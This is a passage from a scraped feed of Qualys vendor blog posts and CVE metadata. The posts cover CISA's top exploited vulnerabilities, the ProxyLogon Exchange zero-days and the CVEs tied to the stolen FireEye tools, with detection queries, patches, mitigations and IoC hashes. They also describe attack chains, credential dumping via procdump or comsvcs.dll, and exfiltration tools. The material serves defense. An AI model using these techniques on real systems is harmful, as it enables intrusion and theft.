277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-11T20:27:44", "description": "**Update March 10, 2021**: A new section describes how to respond with mitigation controls if patches cannot be applied, as recommended by Microsoft. This section details the Qualys Policy Compliance control ids for each vulnerability.\n\n**Update March 8, 2021**: Qualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. QID 50108 is available in VULNSIGS-2.5.125-3 version and above, and is available across all platforms as of March 8th, 1:38 AM ET. This QID is not applicable to agents, so the signature version for the agent will not be updated. QID: 50107, released in VULNSIGS-2.5.121-4 and Windows Cloud Agent manifest 2.5.121.4-3 and above, will accurately detect this vulnerability via agents.\n\n**Original Post**: On March 2nd, [Microsoft released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) a set of out-of-band security updates to address critical remote code execution vulnerabilities in Microsoft Exchange Server. According to Microsoft these vulnerabilities are actively being exploited in the wild, and hence it is recommended to patch them immediately.\n\nTo detect vulnerable instances, Qualys released QID 50107 which detects all vulnerable instances of Exchange server. This QID is included in VULNSIGS-2.5.121-4 version and above.\n\nCVEs addressed as part of this QID are: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\nAmong the above CVEs, [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) are being actively targeted in the wild using zero-day exploits. Microsoft attributes these attacks with high confidence to the HAFNIUM (Chinese cyber spy) threat actor group. These vulnerabilities are related to the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\nAt the time of the security update release the vulnerabilities affect only on-premises Microsoft Exchange Server installations. Exchange online is not affected.\n\n### CVE Technical Details\n\n**[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)** is a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to send arbitrary HTTP requests and authenticate to on-premises Exchange servers. Attackers can also trick the Exchange server to execute arbitrary commands by exploiting this vulnerability.\n\n**[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Attackers who successfully exploit this vulnerability can run their code as SYSTEM on the Exchange server. \n\n**[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)** is a post-authentication arbitrary file write vulnerability in Exchange. Exploiting this vulnerability could allow an attacker to write a file to any part of the target Exchange server. Attackers exploiting this vulnerability could write a file to any path on the target Exchange server.\n\n**[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)** is a post-authentication arbitrary file write vulnerability in Exchange. Similar to CVE-2021-26858, exploiting this vulnerability could allow an attacker to write a file to any path of the target Exchange server.\n\n### Attack Chain\n\nMicrosoft has provided details regarding how the HAFNIUM (threat actor) group is exploiting the above-mentioned critical CVEs. Following sequence of steps summarizes Microsoft\u2019s findings.\n\n 1. The initial step in the attack chain includes the threat actor group making an untrusted connection to the target Exchange server (on port 443) using CVE-2021-26855.\n 2. After successfully establishing the connection, the threat actor group exploits CVE-2021-26857 that gives them ability to run code as SYSTEM on the target Exchange server. This requires administrator permission or another vulnerability to exploit.\n 3. As part of their post-authentication actions, the threat actor group exploits [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) and proceeds to writing files to any path of the target server.\n\nIt has been observed that after gaining the initial access, the threat actor group deployed web shells on the target compromised server.\n\nFollowing table shows the MITRE ATT&CK Technique and Tactic details.\n\n**Tactic**| **Technique**| **Sub-Technique**| **TID** \n---|---|---|--- \nReconnaissance| Gather Victim Identity Information| Email Addresses| T1589.002 \nReconnaissance| Gather Victim Identity Information| IP Addresses| T1589.005 \nResource Development| Develop Capabilities| Exploits| T1587.004 \nInitial Access| Exploit Public-Facing Application| -| T1190 \nExecution| Command and scripting interpreter| PowerShell| T1059.001 \nPersistence| Create Account| Domain Account| T1136.002 \nPersistence| Server Software Component| Web Shell| T1505.003 \nCredential Access| OS Credential Dumping| LSASS Memory| T1003.001 \nCredential Access| OS Credential Dumping| NTDS| T1003.003 \nLateral Movement| Remote Services| SMB/Windows Admin Shares| T1201.002 \nCollection| Archive Collected Data| Archive via Utility| T1560.001 \nCollection| Email Collection| Remote Email Collection| T1114.002 \nCollection| Email Collection| Local Email Collection| T114.001 \nCommand and Control| Remote Access Software| -| T1219 \nExfiltration| Exfiltration over Web Service| Exfiltration to Cloud Storage| T1567.002 \n \n### Discover and Remediate the Zero-Day Vulnerabilities Using Qualys VMDR\n\n##### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange server systems.\n\nQuery: _operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the 0-days as well as any new Windows Exchange server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n##### Discover Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always updated KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\nVMDR query: `vulnerabilities.vulnerability.qid:50107`\n\n\n\nQID 50107 is available in signature version VULNSIGS-2.5.121-4 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.121.4-3 and above.\n\nQualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. This QID is not applicable to agents. QID 50108 is available in VULNSIGS-2.5.125-3 version and above.\n\nOrganizations that use on-premises Exchange installations typically also enable Outlook Web Access (OWA), which is exposed to the internet to allow users to connect into their e-mail systems. It is therefore recommended organizations employ both remote and authenticated scanning methods to get the most accurate view of vulnerable assets, as using only the agent-based approach would not provide a comprehensive picture of the vulnerability exposure.\n\nWith VMDR Dashboard, you can track 'Exchange 0-day', impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Dashboard**: [Exchange Server 0-Day Dashboard | Critical Global View](<https://qualys-secure.force.com/customer/s/article/000006564>)\n\n\n\n##### Respond by Patching\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 50107\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Exchange Server 0-day.\n\n\n\nSecurity updates are available for the following specific versions of Exchange:\n\n * [Update for Exchange Server 2019](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires Cumulative Update (CU) 8 or CU 7\n * [Update for Exchange Server 2016](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 19 or CU 18\n * [Update for Exchange Server 2013](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 23\n * [Update for Exchange Server 2010](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459>): Requires SP 3 or any SP 3 RU\n * This is a defense-in-depth update.\n\nUsers are encouraged to apply patches as soon as possible.\n\n##### Respond with Mitigation Controls if Patches Cannot Be Applied\n\nWe recognize not all organizations may be able patch their systems right away. In such scenarios Microsoft has recommended a few [interim mitigation controls](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) to limit the exploitation of these vulnerabilities. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) has added controls based on these recommendations for impacted Exchange Servers 2013, 2016, and 2019. The vulnerability details and corresponding Control IDs (CIDs) are provided below.\n\n**CVE-2021-26855**: This mitigation will filter https requests that contain malicious X-AnonResource-Backend and malformed X-BEResource cookies which were found to be used in the SSRF attacks in the wild. This will help with defense against the known patterns observed but not the SSRF as a whole.\n\n * **CID 20831** - Status of match URL of rewrite rule 'X-BEResource Abort - inbound' for which action is 'AbortRequest at site level\n * **CID 20834** - Status of match URL of rewrite rule 'X-AnonResource-Backend Abort - inbound' for which action is 'AbortRequest at site level\n\n**CVE-2021-26857**: Disabling the UM Service will mitigate this vulnerability.\n\n * **CID 20829** - Status of 'component' installed on the MS Exchange server\n * **CID 20828** - Status of Microsoft Exchange Unified Messaging Call Router service\n * **CID 20827** - Status of Microsoft Exchange Unified Messaging service\n\n**CVE-2021-27065**: Disabling OAB Application Pool will prevent this CVE from executing successfully as the API will no longer respond and return a 503 when calling OAB, which will mitigate the Arbitrary Write exploit that occurs with OAB. After stopping the WebApp Pool you will also need to set the OabProxy Server Component state to Inactive.\n\n * **CID 20832** - Check the 'startMode' of the OAB Application Pool (MSExchangeOABAppPool)\n\n**CVE-2021-26858**: Disabling ECP Virtual Directory will prevent CVE-2021-27065 from executing successfully as the API will no longer respond and return a 503 when calling the Exchange Control Panel (ECP).\n\n * **CID 20833** - Check the 'startMode' of the ECP Application Pool (MSExchangeECPAppPool)\n\nQualys Policy Compliance can be used to easily monitor these mitigating controls for impacted Exchange assets.\n\n\n\nDrill down into failing controls to view details and identify issues.\n\n\n\n### Post-Compromise Detection Details\n\nAfter compromising a system, an adversary can perform the following activity:\n\nUse legitimate utilities such as procdump or the rundll32 comsvcs.dll method to dump the LSASS process memory. Presumably, this follows exploitation via CVE-2021-26857 as these methods do need administrative privileges.\n\n\n\nUse 7-Zip or WinRar to compress files for exfiltration.\n\n\n\nUse PowerShell based remote administration tools such as Nishang & PowerCat to exfiltrate this data.\n\n\n\nTo maintain persistent access on compromised systems, adversaries may also create a domain user account and install ASPX- and PHP-based web shells for command and control. Information about their probable location and their related hashes are mentioned below.\n\n**Web shell hashes**:\n \n \n b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n**Web shell paths**:\n\n`C:\\inetpub\\wwwroot\\aspnet_client\\ \nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V14\\FrontEnd\\HttpProxy\\owa\\auth\\ \nC:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\`\n\n### References\n\n * https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901\n * https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss3": {}, "published": "2021-03-03T22:12:19", "type": "qualysblog", "title": "Microsoft Exchange Server Zero-Days (ProxyLogon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T22:12:19", "id": "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-02T02:28:27", "description": "In a blog post on Dec. 22, 2020, [Qualys revealed](<https://blog.qualys.com/qualys-insights/2020/12/22/qualys-security-advisory-solarwinds-fireeye>) it has identified 7.5 million instances of vulnerability to the stolen FireEye Red Team assessment tools across an anonymized set of its 15,700-member customer base.\n\nOf the 7.5 million instances of vulnerability, 99.84% were caused by only 8 CVEs, and over 99% were caused by these five CVEs: CVE-2020-1472, CVE-2019-0604, CVE-2017-11774, CVE-2016-0167 and CVE-2019-0708.\n\nIn this article, we examine the five CVEs in detail to:\n\n 1. Help SOC and operational security teams understand the behavioral aspects of these CVEs and plan defensive strategies;\n 2. Help threat hunting teams understand their threat attributes and associated attack vectors and take defensive actions against adversaries actively exploiting these CVEs.\n\nFrom a threat perspective, we explore threat attributes like IoCs, signatures, observables, and malware associated (like ransomware, cryptomining, etc.) with the CVEs. Since these CVEs are related to red teaming exercises, we also provide the list of threat actors known to have widely exploited these CVEs. Finally, we explore the adversary Tactics, Techniques and Procedures (TTPs) applicable for each CVE.\n\nWhile Qualys VMDR is well equipped to detect and patch the respective CVEs, we also present the Indicators of Compromise (IoCs) and signature details associated with the CVEs that can be detected using [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The mitigation details are provided with related vendor-released patch details.\n\nFor a detailed walkthrough of this research and how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) and [EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) can help security teams address the threat, please sign up for the webinar on Thursday, February 4 at 10am Pacific: [Unpacking the CVEs in the FireEye Breach](<https://www.brighttalk.com/webcast/11673/467134>). \n\n\n### CVE-2020-1472 (QID: 91668)\n\nA privilege escalation vulnerability exists when an adversary establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol. An adversary who successfully exploits the vulnerability could run a specially crafted application on a device on the network. See [CVE-2020-1472 security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>).\n\nThis vulnerability will further allow an adversary on the same network as the domain controller to forge an authentication token and reset the domain controller password to a value known only by the adversary.\n\nThe following mapping diagram shows the threat mappings to CVE-2020-1472.\n\n\n\n##### Threat Attribution\n\nFollowing the release of the PoC code for this vulnerability on Sept. 11, 2020, a fully functional exploit was included in the "[Mimikatz](<https://github.com/gentilkiwi/mimikatz>)" tool. According to [Microsoft Security Intelligence](<https://twitter.com/MsftSecIntel/status/1313598440719355904>), threat actors quickly launched campaigns that took advantage of the vulnerability\u2019s critical impact and the available exploit. Notable among the threat actors are: TA 505 (aka Chimborazo), Muddywater (aka Mercury), and Ryuk ransomware gang. The threat actors applied the following distinct attack vectors:\n\n 1. TA 505 (aka Chimborazo) leveraged the legit tool \u201cMimikatz\u201d to exploit the Zerologon vulnerability and further deployed a campaign with fake updates to connect to the threat actor\u2019s C2 infrastructure to perform escalation of privileges.\n 2. The Ryuk ransomware group exploited the Zerologon vulnerability to escalate privileges on target machines. The actor group was further able to reset passwords on the primary domain controller after which they moved laterally to the second domain controller. Researchers further revealed that the Ryuk group pivoted from the primary domain controller, using RDP to connect to the backup servers. See the [Ryuk in 5 Hours](<https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/>) from the DFIR Report.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2020-1472 can be identified by running QID 91668 from Qualys scanner and prevented by applying KB4571736, KB4571702 patches from Microsoft.\n\nIn cases of post-exploitation detection, the following detection methods can be applied.\n\n 1. [Yara rule set](<https://www.cynet.com/zerologon/>) can be used to scan memory dumps of lsass.exe and will alert upon detection of Mimikatz or other Zerologon exploits.\n 2. Scan target infrastructure for existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>).\n\n##### Adversarial TTP\n\nFollowing are the TTP steps sequence that represent adversarial actions:\n\n 1. Valid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]. Allow unauthenticated adversary to gain escalated privilege to domain controller.\n 2. Lateral Movement [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]. Malicious adversaries can leverage this vulnerability to compromise other devices on the same network\n\n### CVE-2019-0604 (QID: 110330)\n\nA remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An adversary successfully exploiting the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account. See [CVE-2019-0604 security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>).\n\nThe following mapping diagram shows the threat mappings to CVE-2019-0604.\n\n\n\n##### Threat Attribution:\n\nCVE-2019-0604 has been primarily used to install webshells on target SharePoint servers.\n\nEmissary Panda (aka APT27, TG-3390, Bronze Union, Lucky Mouse) threat actor has been identified back in April 2019 to have extensively exploited CVE-2019-0604 to install webshells (primarily China Chopper) on SharePoint servers targeting Government Organizations. The threat actor group further performed lateral movement by dumping credentials using Mimikatz in the post-exploitation phase.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2019-0604 can be identified by running QID 110330 from Qualys vulnerability scanner and prevented by then applying KB4462199, KB4462202, KB4462143, KB4462184, KB4461630, KB4462211(for applicable product versions) patches from Microsoft.\n\nIn cases of post exploitation detection, organizations can look up for the following [CVE-2019-0604 IoCs](<https://otx.alienvault.com/pulse/5cd3f89df12b501c477a6fba>) within their environment.\n \n \n MD5 Hash: b814532d73c7e5ffd1a2533adc6cfcf8\n SHA1 Hash: dc8e7b7de41cac9ded920c41b272c885e1aec279\n SHA256 Hash: 05108ac3c3d708977f2d679bfa6d2eaf63b371e66428018a68efce4b6a45b4b4\n MD5 Hash: 708544104809ef2776ddc56e04d27ab1\n SHA1 Hash: f0fb0f7553390f203669e53abc16b15e729e5c6f\n SHA256 Hash: b560c3b9b672f42a005bdeae79eb91dfb0dec8dc04bea51f38731692bc995688\n MD5 Hash: 0eebeef32a8f676a1717f134f114c8bd\n SHA1 Hash: 4c3b262b4134366ad0a67b1a2d6378da428d712b\n SHA256 Hash: 7d6812947e7eafa8a4cce84b531f8077f7434dbed4ccdaca64225d1b6a0e8604\n MD5 Hash: 5001ef50c7e869253a7c152a638eab8a\n\n##### Adversarial TTP\n\nFollowing are the TTP steps sequence that represent adversarial actions:\n\n 1. Exploitation for client execution [T1203]. Adversaries exploit a deserialization technique without input validation in the DecodeEntityInstanceId method within the Microsoft.SharePoint.dll library. The method is ultimately exposed to authenticated end-users through a picker.aspx page, where a specially crafted web request could lead to execution of arbitrary code.\n 2. Exploitation for Privilege Escalation [T1068]. Adversaries execute a webshell to elevate their privileges on target SharePoint server.\n 3. Lateral Movement [TA0008]: Adversaries use post exploitation tools like Mimikatz to perform credential dumping and perform lateral movement on the target network.\n\n### CVE-2019-0708 (QID: 91541, 91534)\n\nA remote code execution vulnerability exists in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An adversary who successfully exploits this vulnerability could execute arbitrary code on the target system. The adversary could then install programs; view, change, or delete data; or create new accounts with full user rights. See [CVE-2019-0708 security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>).\n\nThe following mapping diagram shows the threat mappings to CVE-2019-0708.\n\n\n\n##### Threat Attribution\n\nSince CVE-2019-0708 can be exploited remotely by sending a specially crafted RDP request and given its wormable nature, a working PoC exploit code was available 24 hours after the vulnerability was disclosed.\n\nDue to the critical impact this vulnerability has on the target network, it\u2019s heavily targeted by various threat actors. Primarily for [cryptomining](<https://twitter.com/GossiTheDog/status/1221219622164353025>).\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2019-0708 can be identified by running QIDs 91541, 91534 from Qualys vulnerability scanner and prevented by then applying KB4499164, KB4499175, KB4499149, KB4499180 (for applicable product versions) patches from Microsoft.\n\nIn cases of post exploitation detection, scan target infrastructure for existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>).\n\n##### Adversarial TTP\n\nFollowing are the TTP steps sequence that represent adversarial actions\n\n 1. Exploit Public Facing Application [T1190]. Adversaries scan for internet facing systems running a required RDP version.\n 2. Remote Services: Remote Desktop Protocol [T1021.001]: Adversaries send a specially crafted request to target RDP service.\n 3. Lateral Movement [TA0008]. Using to the wormable nature of the vulnerability, adversaries perform a rapid lateral movement over the target network.\n\n### CVE-2017-11774 (QID: 110306)\n\nA security feature bypass vulnerability exists when Microsoft Outlook improperly handles objects in memory. An adversary who successfully exploits the vulnerability could execute arbitrary commands. An adversary could provide a specially crafted document file designed to exploit the vulnerability, and then convince users to open the document file and interact with the document. See [CVE-2017-11774 security update](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11774>).\n\nThe following mapping diagram shows the threat mappings to CVE-2017-11774.\n\n\n\n##### Threat Attribution\n\nThe US cyber command has [issued an alert](<https://twitter.com/CNMF_CyberAlert/status/1146130046127681536>) about threat actors\u2019 active malicious use of CVE-2017-11774. While the alert did not mention the threat actor, further research revealed the threat actor to be APT 33. The threat actor is known for using the exploitation [technique published by SensePost](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) and combining it with password spraying techniques for lateral movement on the target network.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2017-11774 can be identified by running QID 110306 from Qualys vulnerability scanner and prevented by then applying KB4011178, KB4011196, KB4011162 (for applicable product versions) patches from Microsoft.\n\nIn cases of post-exploitation detection, the following detection methods can be applied:\n\n 1. [Yara rule set](<https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html>) can be used to detect Outlook home page shell and persistence.\n 2. Scan target infrastructure for existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>).\n\nIn cases of post-exploitation detection, can be used to detect Outlook home page shell and persistence.\n\n##### Adversarial TTP\n\nFollowing are the TTP steps sequence that represent adversarial actions:\n\n 1. User Execution: Malicious File [T1204.002]. The adversary sends a malicious URL or file for the user in a phishing attempt to click.\n 2. Office Application Startup \u2013 Outlook Home Page [T1137.004]. When the remote URL is clicked, it will render the contents using the Windows DLL ieframe.dll. This will persist through system restarts. allowing the adversary an attacker to achieve remote code execution that persists through system restarts.\n 3. Execution [TA002]. Since the rendered code is persistent, the adversary performs remote code execution.\n 4. Lateral Movement [TA0008]. Adversaries use password spraying techniques to perform lateral movement over the target network.\n\n### CVE-2016-0167 (QID: 91204)\n\nA privilege escalation vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An adversary who successfully exploited this vulnerability could run processes in an elevated context. In a local attack scenario, the adversary could exploit this vulnerability by running a specially crafted application to take control over the affected system. See [CVE-2016-0167 security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2016-0167>).\n\nThe following mapping diagram shows the TTP chain and observables related to CVE-2016-0167.\n\n\n\n##### Threat Attribution\n\nThis local privilege escalation was targeted by \u201cBuggiCorp\u201d threat actor. The threat actor created the exploit for the zero-day version of CVE-2016-0167 and put it on sale for $90,000 in cybercrime forum exploit[dot]in.\n\nIn another instance, a financially motivated threat actor launched spear phishing email campaigns targeting CVE-2016-0167. This was [primarily targeted](<https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html>) towards retail, restaurant and hospitality industries8.\n\n##### Prevention and Detection\n\nAdversary attempts to exploit CVE-2016-0167 can be identified by running QID 91204 from Qualys vulnerability scanner and prevented by then applying KB3145739 patch from Microsoft.\n\nExistence of the following observables will allow responders to identify the successful exploitation of CVE-2016-0167:\n\nExploit.doc.MVX, Malware.Binary.Doc, PUNCHBUGGY, Malware.Binary.exe, and PUNCHTRACK.\n\nFinally, scan the target: Scan target infrastructure for existence of the set of [IoCs provided by Qualys](<https://www.qualys.com/docs/fireeye-cve-hashes.txt>) to detect the post-exploitation proof for CVE-2016-0167.\n\n##### Adversarial TTP\n\n 1. Phishing: Spear phishing Attachment [T1566.001]: 